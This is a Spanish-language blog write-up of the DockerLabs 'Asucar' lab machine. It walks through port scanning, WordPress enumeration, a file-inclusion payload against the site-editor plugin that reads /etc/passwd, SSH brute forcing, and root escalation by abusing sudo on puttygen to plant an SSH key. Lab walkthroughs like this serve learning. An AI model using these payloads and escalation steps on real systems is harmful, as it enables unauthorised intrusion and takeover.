<!DOCTYPE html>
<html lang="en-US">
  <head>
    <meta charset='utf-8'>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="/assets/css/style.css?v=5fdc73dbc748710b5d954669c64acfd639531df9">
    <!-- start custom head snippets, customize with your own _includes/head-custom.html file -->

<!-- Setup theme-color -->
<!-- start theme color meta headers -->
<meta name="theme-color" content="#151515">
<meta name="msapplication-navbutton-color" content="#151515">
<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
<!-- end theme color meta headers -->


<!-- Setup Google Analytics -->



<!-- You can set your favicon here -->
<!-- link rel="shortcut icon" type="image/x-icon" href="/favicon.ico" -->

<!-- end custom head snippets -->


<!-- Begin Jekyll SEO tag v2.8.0 -->
<title>Asuacar | Mi Sitio Hacker</title>
<meta name="generator" content="Jekyll v3.10.0" />
<meta property="og:title" content="Asuacar" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="En esta fase inicial, realizamos un escaneo de puertos para identificar los servicios disponibles en la máquina objetivo. Utilizamos la herramienta Nmap con una serie de opciones para obtener información detallada y realizar un análisis exhaustivo de los puertos abiertos. Comando Nmap utilizado:" />
<meta property="og:description" content="En esta fase inicial, realizamos un escaneo de puertos para identificar los servicios disponibles en la máquina objetivo. Utilizamos la herramienta Nmap con una serie de opciones para obtener información detallada y realizar un análisis exhaustivo de los puertos abiertos. Comando Nmap utilizado:" />
<link rel="canonical" href="http://localhost:4000/2024/11/30/asuacar.html" />
<meta property="og:url" content="http://localhost:4000/2024/11/30/asuacar.html" />
<meta property="og:site_name" content="Mi Sitio Hacker" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2024-11-30T00:00:00-05:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="Asuacar" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2024-11-30T00:00:00-05:00","datePublished":"2024-11-30T00:00:00-05:00","description":"En esta fase inicial, realizamos un escaneo de puertos para identificar los servicios disponibles en la máquina objetivo. Utilizamos la herramienta Nmap con una serie de opciones para obtener información detallada y realizar un análisis exhaustivo de los puertos abiertos. Comando Nmap utilizado:","headline":"Asuacar","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/2024/11/30/asuacar.html"},"url":"http://localhost:4000/2024/11/30/asuacar.html"}</script>
<!-- End Jekyll SEO tag -->

  </head>

  <body>

    <header>
      <div class="container">
        <a id="a-title" href="/">
          <h1>Mi Sitio Hacker</h1>
        </a>
        <h2>Un sitio con estilo hacker para pentesting y labs.</h2>

        <section id="downloads">
          
          <a href="https://github.com/kamilfire/kamilfire.github.io" class="btn btn-github"><span class="icon"></span>View on GitHub</a>
        </section>
      </div>
    </header>

    <div class="container">
      <section id="main_content">
        <small>30 November 2024</small>
<h1>Asuacar</h1>

<p class="view">by </p>


<p><img src="https://github.com/haw441kings/DockerLabsWriteUps/assets/136659799/3f384ac3-7071-4676-97d3-72422646c53f" alt="image" />
En esta fase inicial, realizamos un escaneo de puertos para identificar los servicios disponibles en la máquina objetivo. Utilizamos la herramienta Nmap con una serie de opciones para obtener información detallada y realizar un análisis exhaustivo de los puertos abiertos.</p>
<h3 id="comando-nmap-utilizado">Comando Nmap utilizado:</h3>

<p><code class="language-plaintext highlighter-rouge">sudo nmap -p- --open -sS -sC -sV --min-rate 5000 -vvv -n -Pn 192.168.52.139 -oN Escaneo</code></p>

<h3 id="detalles-del-comando">Detalles del Comando:</h3>

<ul>
  <li><code class="language-plaintext highlighter-rouge">sudo nmap -p- --open -sS -sC -sV --min-rate 5000 -vvv -n -Pn 192.168.52.139 -oN Escaneo</code></li>
  <li><code class="language-plaintext highlighter-rouge">-p-</code>: Escaneo de todos los puertos.</li>
  <li><code class="language-plaintext highlighter-rouge">--open</code>: Muestra solo puertos abiertos.</li>
  <li><code class="language-plaintext highlighter-rouge">-sS</code>: Escaneo SYN para determinar el estado de los puertos.</li>
  <li><code class="language-plaintext highlighter-rouge">-sC</code>: Activa detección de versiones y vulnerabilidades.</li>
  <li><code class="language-plaintext highlighter-rouge">-sV</code>: Escaneo de versiones de servicios.</li>
  <li><code class="language-plaintext highlighter-rouge">--min-rate 5000</code>: Velocidad mínima de escaneo.</li>
  <li><code class="language-plaintext highlighter-rouge">-vvv</code>: Verbosidad muy alta para información detallada.</li>
  <li><code class="language-plaintext highlighter-rouge">-n</code>: Desactiva la resolución de DNS.</li>
  <li><code class="language-plaintext highlighter-rouge">-Pn</code>: Ignora la detección de hosts en línea.</li>
  <li><code class="language-plaintext highlighter-rouge">192.168.52.139</code>: IP de la máquina objetivo.</li>
  <li><code class="language-plaintext highlighter-rouge">-oN Escaneo</code>: Guarda resultados en archivo “Escaneo”.</li>
</ul>

<h3 id="resultados">Resultados:</h3>

<h4 id="puertos-abiertos">Puertos Abiertos:</h4>

<ol>
  <li><strong>22/tcp(SSH):</strong> OpenSSH 9.2p1</li>
  <li><strong>80/tcp(HTTP):</strong> Apache httpd 2.4.59</li>
</ol>

<h3 id="puerto-8080">Puerto 8080</h3>
<p>Al identificar que el puerto 80 estaba abierto durante el escaneo, se procedió a ingresar la dirección IP en el navegador. Sobre el Asucar Moreno.
<img src="https://github.com/haw441kings/DockerLabsWriteUps/assets/136659799/54ec7f98-99c8-4daa-9738-96c519e0dbc6" alt="image" /></p>

<h3 id="dns">DNS</h3>
<p><img src="https://github.com/haw441kings/DockerLabsWriteUps/assets/136659799/9fc82b45-82f9-40e3-a07d-46b1e8641cff" alt="image" /></p>

<p>Si hacemos click sobre algún botón, nos sale este mensaje, tenemos que agregar asucar.dl, a nuestro /etc/hosts.</p>

<p><img src="https://github.com/haw441kings/DockerLabsWriteUps/assets/136659799/707781f2-a358-4e34-8545-c52c33ce0ed5" alt="image" />
Y ya funciona.</p>

<h1 id="fase-2--exploración">Fase 2- Exploración</h1>

<h4 id="wp">WP</h4>
<p><img src="https://github.com/haw441kings/DockerLabsWriteUps/assets/136659799/e8858ebd-f009-4022-bdab-c132e5997c4e" alt="image" />
La pagina web esta corriendo un wordpress, vamos a enumerar.</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">&gt;</span> <span class="n">wpscan</span> <span class="o">--</span><span class="n">url</span> <span class="n">http</span><span class="p">:</span><span class="o">//</span><span class="n">asucar</span><span class="p">.</span><span class="n">dl</span><span class="o">/</span> <span class="o">--</span><span class="n">random</span><span class="o">-</span><span class="n">user</span><span class="o">-</span><span class="n">agent</span>
<span class="n">_______________________________________________________________</span>
         <span class="n">__</span>          <span class="n">_______</span>   <span class="n">_____</span>
         \ \        <span class="o">/</span> <span class="o">/</span>  <span class="n">__</span> \ <span class="o">/</span> <span class="n">____</span><span class="o">|</span>
          \ \  <span class="o">/</span>\  <span class="o">/</span> <span class="o">/|</span> <span class="o">|</span><span class="n">__</span><span class="p">)</span> <span class="o">|</span> <span class="p">(</span><span class="n">___</span>   <span class="n">___</span>  <span class="n">__</span> <span class="n">_</span> <span class="n">_</span> <span class="n">__</span> <span class="err">®</span>
           \ \<span class="o">/</span>  \<span class="o">/</span> <span class="o">/</span> <span class="o">|</span>  <span class="n">___</span><span class="o">/</span> \<span class="n">___</span> \ <span class="o">/</span> <span class="n">__</span><span class="o">|/</span> <span class="n">_</span><span class="err">`</span> <span class="o">|</span> <span class="s">'_ </span><span class="se">\
</span><span class="s">            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://asucar.dl/ [172.17.0.2]
[+] Started: Sat Jun  8 11:43:27 2024

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.59 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://asucar.dl/xmlrpc.php
 | Found By: Link Tag (Passive Detection)
 | Confidence: 100%
 | Confirmed By: Direct Access (Aggressive Detection), 100% confidence
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://asucar.dl/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://asucar.dl/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://asucar.dl/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 6.5.3 identified (Latest, released on 2024-05-07).
 | Found By: Rss Generator (Passive Detection)
 |  - http://asucar.dl/index.php/feed/, &lt;generator&gt;https://wordpress.org/?v=6.5.3&lt;/generator&gt;
 |  - http://asucar.dl/index.php/comments/feed/, &lt;generator&gt;https://wordpress.org/?v=6.5.3&lt;/generator&gt;

[+] WordPress theme in use: twentytwentyfour
 | Location: http://asucar.dl/wp-content/themes/twentytwentyfour/
 | Latest Version: 1.1 (up to date)
 | Last Updated: 2024-04-02T00:00:00.000Z
 | Readme: http://asucar.dl/wp-content/themes/twentytwentyfour/readme.txt
 | [!] Directory listing is enabled
 | Style URL: http://asucar.dl/wp-content/themes/twentytwentyfour/style.css
 | Style Name: Twenty Twenty-Four
 | Style URI: https://wordpress.org/themes/twentytwentyfour/
 | Description: Twenty Twenty-Four is designed to be flexible, versatile and applicable to any website. Its collecti...
 | Author: the WordPress team
 | Author URI: https://wordpress.org
 |
 | Found By: Css Style In Homepage (Passive Detection)
 | Confirmed By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.1 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://asucar.dl/wp-content/themes/twentytwentyfour/style.css, Match: '</span><span class="n">Version</span><span class="p">:</span> <span class="mf">1.1</span><span class="s">'

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] site-editor
 | Location: http://asucar.dl/wp-content/plugins/site-editor/
 | Last Updated: 2017-05-02T23:34:00.000Z
 | [!] The version is out of date, the latest version is 1.1.1
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.1 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://asucar.dl/wp-content/plugins/site-editor/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://asucar.dl/wp-content/plugins/site-editor/readme.txt

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 &lt;=============================================================================================================================&gt; (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sat Jun  8 11:43:31 2024
[+] Requests Done: 171
[+] Cached Requests: 6
[+] Data Sent: 54.966 KB
[+] Data Received: 341.256 KB
[+] Memory used: 254.312 MB
[+] Elapsed time: 00:00:03
</span></code></pre></div></div>
<p>El escaneo de WPScan en <code class="language-plaintext highlighter-rouge">http://asucar.dl/</code> revela un servidor Apache/2.4.59 (Debian) con XML-RPC habilitado y listado de directorios activo en <code class="language-plaintext highlighter-rouge">http://asucar.dl/wp-content/uploads/</code>. El sitio utiliza WordPress versión 6.5.3 con el tema “twentytwentyfour” actualizado. Se identificó un plugin desactualizado llamado site-editor en la versión 1.1.</p>

<h1 id="fase-3--explotación">Fase 3- Explotación</h1>

<h4 id="11v">1.1v</h4>
<p><img src="https://github.com/haw441kings/DockerLabsWriteUps/assets/136659799/61fc8c35-937e-40a6-b787-38162928f7ff" alt="image" />
Encontramos un Local File Inclusion para el plugins <code class="language-plaintext highlighter-rouge">site-editor 1.1</code>.</p>

<h4 id="44340txt">44340.txt</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>❯ searchsploit -m php/webapps/44340.txt

  Exploit: WordPress Plugin Site Editor 1.1.1 - Local File Inclusion
      URL: https://www.exploit-db.com/exploits/44340
     Path: /usr/share/exploitdb/exploits/php/webapps/44340.txt
    Codes: CVE-2018-7422
 Verified: True
File Type: Unicode text, UTF-8 text
cp: overwrite '/home/sansett/t4ifi/Maquinas/DockerLabs/Medias/asucar/scripts/44340.txt'? s
Copied to: /home/?/?/Maquinas/DockerLabs/Medias/asucar/scripts/44340.txt


❯ ls
 44340.txt
</code></pre></div></div>
<p>Lo bajamos, y dentro nos dice que para explotar esta vulnerabilidad tenemos que ejecutar de esta forma:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>http://&lt;host&gt;/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd
</code></pre></div></div>
<p>Y se esta forma podríamos leer el passwd.</p>

<p><img src="https://github.com/haw441kings/DockerLabsWriteUps/assets/136659799/be81aef2-0b5e-4878-99b5-8a43bbe00bfa" alt="image" />
Y lo conseguimos leer. Encontramos el usuario curiosito. Y si recordamos la maquina victima tiene el puerto 22 abierto, podemos hacer fuerza bruta.</p>

<h4 id="hydra">Hydra</h4>
<p><img src="https://github.com/haw441kings/DockerLabsWriteUps/assets/136659799/438a7e9f-31ee-45b8-a07b-c9f3cd4c31e3" alt="image" />
Y encontramos la contraseña del usuario curiosito.</p>

<h1 id="fase-4--privilegios">Fase 4- Privilegios</h1>

<h4 id="sudo--l">sudo -l</h4>
<p><img src="https://github.com/haw441kings/DockerLabsWriteUps/assets/136659799/15adcfd1-5136-4e3b-8ffe-3907b333861c" alt="image" /></p>

<p>Despues de realizar el tratamiento de la TTY, al hacer el comando <code class="language-plaintext highlighter-rouge">sudo -l</code>, tenemos permisos de ejecución del binario <code class="language-plaintext highlighter-rouge">puttygen</code>.</p>

<h4 id="puttygen">puttygen</h4>
<p>Puttygen se utiliza específicamente para generar claves SSH. Vamos a generar una clave para el usuario root.</p>

<p><img src="https://github.com/haw441kings/DockerLabsWriteUps/assets/136659799/86ae8c9b-8c05-4a22-8fb8-7da63e117ab6" alt="image" /></p>

<p>Los comandos que ejecutamos fueron:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">-</span> <span class="n">puttygen</span> <span class="o">-</span><span class="n">t</span> <span class="n">rsa</span> <span class="o">-</span><span class="n">b</span> <span class="mi">2048</span> <span class="o">-</span><span class="n">O</span> <span class="n">private</span><span class="o">-</span><span class="n">openssh</span> <span class="o">-</span><span class="n">o</span> <span class="o">~/</span><span class="p">.</span><span class="n">ssh</span><span class="o">/</span><span class="n">hacked</span>

<span class="o">-</span> <span class="n">puttygen</span> <span class="o">-</span><span class="n">L</span> <span class="o">~/</span><span class="p">.</span><span class="n">ssh</span><span class="o">/</span><span class="n">hacked</span><span class="err"> »</span> <span class="o">~/</span><span class="p">.</span><span class="n">ssh</span><span class="o">/</span><span class="n">authorized_keys</span>

<span class="o">-</span> <span class="n">sudo</span> <span class="n">puttygen</span> <span class="o">/</span><span class="n">home</span><span class="o">/</span><span class="n">curiosito</span><span class="o">/</span><span class="p">.</span><span class="n">ssh</span><span class="o">/</span><span class="n">hacked</span> <span class="o">-</span><span class="n">o</span> <span class="o">/</span><span class="n">root</span><span class="o">/</span><span class="p">.</span><span class="n">ssh</span><span class="o">/</span><span class="n">hacked</span>

<span class="o">-</span> <span class="n">sudo</span> <span class="n">puttygen</span> <span class="o">/</span><span class="n">home</span><span class="o">/</span><span class="n">curiosito</span><span class="o">/</span><span class="p">.</span><span class="n">ssh</span><span class="o">/</span><span class="n">hacked</span> <span class="o">-</span><span class="n">o</span> <span class="o">/</span><span class="n">root</span><span class="o">/</span><span class="p">.</span><span class="n">ssh</span><span class="o">/</span><span class="n">authorized_keys</span> <span class="o">-</span><span class="n">O</span> <span class="n">public</span><span class="o">-</span><span class="n">openssh</span>

<span class="o">-</span> <span class="n">ssh</span> <span class="o">-</span><span class="n">i</span> <span class="o">/</span><span class="n">home</span><span class="o">/</span><span class="n">curiosito</span><span class="o">/</span><span class="p">.</span><span class="n">ssh</span><span class="o">/</span><span class="n">hacked</span> <span class="n">root</span><span class="o">@</span><span class="n">localhost</span>
</code></pre></div></div>
<p>on <code class="language-plaintext highlighter-rouge">puttygen -t rsa -b 2048 -O private-openssh -o ~/.ssh/hacked</code> se crea una clave RSA de 2048 bits y se guarda en <code class="language-plaintext highlighter-rouge">~/.ssh/hacked</code>. Luego, <code class="language-plaintext highlighter-rouge">puttygen -L ~/.ssh/hacked » ~/.ssh/authorized_keys</code> añade la clave pública a <code class="language-plaintext highlighter-rouge">~/.ssh/authorized_keys</code> para autenticación SSH. El comando <code class="language-plaintext highlighter-rouge">ssh -i /home/curiosito/.ssh/hacked root@localhost</code> inicia una conexión SSH usando la clave privada generada.</p>




  <small>tags: <em></em></small>


      </section>
    </div>
  </body>
</html>
